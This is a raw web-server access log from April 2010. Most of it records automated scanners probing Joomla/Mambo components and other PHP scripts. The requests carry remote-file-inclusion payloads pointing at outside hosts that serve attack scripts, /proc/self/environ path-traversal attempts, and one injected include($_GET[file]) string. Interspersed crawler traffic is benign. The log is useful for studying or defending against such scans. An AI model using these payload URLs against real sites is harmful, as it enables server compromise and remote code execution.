118.217.216.132 - - [28/Apr/2010:00:59:54 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [28/Apr/2010:00:59:54 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.217.216.132 - - [28/Apr/2010:00:59:55 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
118.217.216.132 - - [28/Apr/2010:01:00:09 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [28/Apr/2010:01:00:10 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
118.217.216.132 - - [28/Apr/2010:01:00:10 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:05:58 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:05:58 -0500] "GET /logs/access_log.1266364800/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:05:58 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:07:53 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:07:53 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:07:53 -0500] "GET /logs/access_log.1229644800%20%20/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:08:15 -0500] "GET /logs/access_log.1265155200/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:08:15 -0500] "GET /logs/access_log.1264032000/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:09:18 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:09:18 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:09:18 -0500] "GET /logs/access_log.1219363200//doceboCms/class/class.dashboard_cms.php?where_framework=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
110.45.145.92 - - [28/Apr/2010:01:13:49 -0500] "GET /logs/access_log.1219363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.145.92 - - [28/Apr/2010:01:13:49 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.145.92 - - [28/Apr/2010:01:13:50 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
78.110.50.139 - - [28/Apr/2010:01:14:06 -0500] "GET /logs/access_log.1229644800%20%20/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:14:48 -0500] "GET /logs/access_log.1265155200/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:14:48 -0500] "GET /logs/access_log.1264032000/components/com_simpleboard/image_upload.php?sbp=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:01:19:21 -0500] "GET /logs/access_log.1268956800/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:01:20:26 -0500] "GET /logs/access_log.1268956800/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.13.53 - - [28/Apr/2010:01:21:24 -0500] "GET /logs/access_log.1193011200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.51 - - [28/Apr/2010:01:21:24 -0500] "GET /logs/access_log.1182470400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.252.224.4 - - [28/Apr/2010:01:23:44 -0500] "GET //index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:23:44 -0500] "GET /logs//index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.252.224.4 - - [28/Apr/2010:01:23:44 -0500] "GET /logs/access_log.1219363200//index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:01:26:53 -0500] "GET /logs/access_log.1220054400/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
81.21.79.214 - - [28/Apr/2010:01:27:22 -0500] "GET /logs/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.21.79.214 - - [28/Apr/2010:01:27:22 -0500] "GET /index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.249.126.147 - - [28/Apr/2010:01:27:36 -0500] "GET //Neos_Chronos/header.php?base_folder=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:27:36 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:27:36 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:01:28:07 -0500] "GET /logs/access_log.1220054400/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 373 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:28:27 -0500] "GET //index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:28:27 -0500] "GET /logs//index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.110.50.139 - - [28/Apr/2010:01:28:27 -0500] "GET /logs/access_log.1219363200//index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:28:57 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:30:08 -0500] "GET //atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:30:08 -0500] "GET /logs//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:30:08 -0500] "GET /logs/access_log.1220054400%20%20//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:30:09 -0500] "GET /logs/access_log.1219363200%20%20//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:01:30:11 -0500] "GET /artwork/carousel.htm HTTP/1.0" 200 814 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.8.3.157 - - [28/Apr/2010:01:30:32 -0500] "GET //modules/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.8.3.157 - - [28/Apr/2010:01:30:32 -0500] "GET /logs/access_log.1268956800//modules/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.8.3.157 - - [28/Apr/2010:01:30:32 -0500] "GET /logs//modules/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.46.13.52 - - [28/Apr/2010:01:30:55 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.249.126.147 - - [28/Apr/2010:01:31:11 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:31:11 -0500] "GET /logs/access_log.1220054400%20%20//agendax/addevent.inc.php?agendax_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:31:11 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:31:23 -0500] "GET /logs/access_log.1265068800//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:31:23 -0500] "GET /logs/access_log.1266710400//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:32:18 -0500] "GET /logs/access_log.1225238400//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:33:25 -0500] "GET /logs/access_log.1263600000//atom.php5?page=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.21.79.214 - - [28/Apr/2010:01:35:21 -0500] "GET /logs/access_log.1219708800/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.21.79.214 - - [28/Apr/2010:01:35:22 -0500] "GET /index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.21.79.214 - - [28/Apr/2010:01:35:22 -0500] "GET /logs/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
64.15.156.83 - - [28/Apr/2010:01:35:47 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:35:47 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:01:35:47 -0500] "GET /logs/access_log.1212969600%20%20//newspublish/include.php?path%5Bdocroot%5D=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.172.232.251 - - [28/Apr/2010:01:36:26 -0500] "GET /logs/access_log.1270684800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
211.172.232.251 - - [28/Apr/2010:01:36:27 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
211.172.232.251 - - [28/Apr/2010:01:36:28 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
78.110.50.120 - - [28/Apr/2010:01:36:57 -0500] "GET //modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:36:57 -0500] "GET /logs/access_log.1220054400%20%20//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:36:57 -0500] "GET /logs//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.21.79.214 - - [28/Apr/2010:01:37:00 -0500] "GET /logs/access_log.1220054400/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.199.177 - - [28/Apr/2010:01:37:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.120 - - [28/Apr/2010:01:37:06 -0500] "GET /logs/access_log.1220054400//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:37:06 -0500] "GET //modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:37:06 -0500] "GET /logs//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.204.191 - - [28/Apr/2010:01:37:25 -0500] "GET /logs/access_log.1185148800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:37:35 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:39:59 -0500] "GET //modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:39:59 -0500] "GET /logs//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.120 - - [28/Apr/2010:01:39:59 -0500] "GET /logs/access_log.1220054400//modules/My_eGallery/errors.php?error=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:01:40:02 -0500] "GET /logs/access_log.1220054400//agendax/addevent.inc.php?agendax_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.127.253.75 - - [28/Apr/2010:01:44:02 -0500] "GET /logs/access_log.1270684800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.826"
210.127.253.75 - - [28/Apr/2010:01:44:03 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.826"
210.127.253.75 - - [28/Apr/2010:01:44:04 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.826"
222.231.60.209 - - [28/Apr/2010:01:51:55 -0500] "GET /logs/access_log.1219363200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:01:51:55 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:01:51:55 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:01:51:56 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:01:51:56 -0500] "GET /logs/access_log.1219363200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:01:51:56 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.52.150.147 - - [28/Apr/2010:01:54:43 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:01:54:43 -0500] "GET /logs/errors.php?error=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:01:54:43 -0500] "GET /errors.php?error=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.46.13.138 - - [28/Apr/2010:01:55:55 -0500] "GET /logs/access_log.1240963200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
180.210.205.21 - - [28/Apr/2010:01:58:33 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:01:58:33 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.216.55 - - [28/Apr/2010:02:08:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.52.150.147 - - [28/Apr/2010:02:09:26 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:00 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:20 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:20 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:12:20 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.52.150.147 - - [28/Apr/2010:02:13:25 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
67.195.112.180 - - [28/Apr/2010:02:14:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [28/Apr/2010:02:14:15 -0500] "GET /logs/access_log.1225324800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [28/Apr/2010:02:14:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
72.52.150.147 - - [28/Apr/2010:02:16:33 -0500] "GET /logs/access_log.1212537600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.waterdistrict2.com/poll/.log?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.46.13.89 - - [28/Apr/2010:02:28:25 -0500] "GET /logs/access_log.1182124800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.41.26 - - [28/Apr/2010:02:31:26 -0500] "GET /index.php?option=/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
210.190.64.68 - - [28/Apr/2010:02:33:37 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:02:33:37 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 3477 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:02:33:37 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:02:34:32 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:02:34:32 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:02:34:32 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 3477 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:02:34:33 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 3477 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:02:34:33 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
